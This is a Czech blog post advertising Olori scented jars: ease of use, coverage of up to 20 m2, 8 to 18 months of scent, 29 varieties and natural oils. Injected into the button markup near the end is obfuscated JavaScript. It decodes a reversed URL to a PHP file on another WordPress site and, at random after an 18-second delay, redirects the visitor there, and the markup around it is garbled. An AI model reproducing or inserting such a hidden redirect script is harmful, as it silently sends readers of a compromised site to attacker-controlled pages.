Pět důvodů proč si pořídit vonnou sklenici

12.9. 20210 Komentářů

Otevřená malá zavařovačka v pestré barvě, ze které se po pokoji line příjemná vůně, vzbudí zvědavost v nejednom z nás. Aroma difuzér to není, ale základní funkce je stejná, o co se tedy jedná? Je to vonná sklenice, která v sobě ukrývá přírodní olej a integrovanou houbu, skrze niž se olej velmi pomalu odpařuje. Že jste o ní ještě neslyšeli? Není se čemu divit, jedná se totiž o novinku mezi bytovými vůněmi. A proč si jí pořídit?

Snadná manipulace

Největší výhodou Olori vonných sklenic je rychlé použití a velmi snadná manipulace. Sklenici stačí jednoduše otevřít a umístit kde je potřeba. Jakmile budete mít náladu na jinou vůni, jednoduše ji zavřete, schováte a použijete třeba jinou. Výhodou této jednoduché manipulace je i to, že sklenici můžete vzít kamkoliv s sebou, na chatu, na dovolenou nebo do práce. Další z předností je i velikost. Sklenice o objemu 100ml se totiž vejde i do úzké police.

Vonné sklenice

Provoní velké prostory

Olori vonná sklenice je vhodná pro použití v domácnosti, ale také ve větších prostorech, jako jsou třeba kanceláře (do 20 m2). Je však dobré sklenici umístit do středu místnosti spíše v nižších polohách a vyhnout se blízkosti zdrojů tepla. Ideálně tedy například na konferenční stolek.

Dlouhá výdrž

Intenzita vůně vydrží od 8 do 18 měsíců, záleží na četnosti používání. Sklenici lze totiž snadno zavřít a schovat. Pro udržení intenzivní vůně je dobré sklenici jednou týdně na 3-4 hodiny zavřít a postavit víčkem dolů. Olej se pak rovnoměrně rozlije, dostane do houby a vůně se oživí. Celková doba trvanlivosti je přibližně 5 let.

Olori Vonná Sklenice Obal

Široký výběr

Olori vonné sklenice jsou k dostání celkem ve 29 druzích. Vyberou si milovníci svěžích ovocných vůní, tak i ti, kteří dávají přednost kořeněným tónům. Kompletní nabídku najdete zde.

Přírodní báze

Tak jako Olori aroma difuzéry i Olori vonné sklenice jsou vyrobeny z přírodních éterických olejů bez umělých vonných látek a bez alkoholu.

Vyzkoušejte taky novinku ze světa bytových vůni nebo jí darujte jako vánoční dárek.

tons -->

ton {"className":"is-style-outline"} -->
$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}ton__link“ href=““ target=“_blank“ rel=“noreferrer noopener“>Chci vonnou sklenici

Komentáře

Přidat komentář

Vaše e-mailová adresa nebude zveřejněna.

Vaše osobní údaje budou použity pouze pro účely zpracování tohoto komentáře.

Tato stránka používá Akismet k omezení spamu. Podívejte se, jak vaše data z komentářů zpracováváme..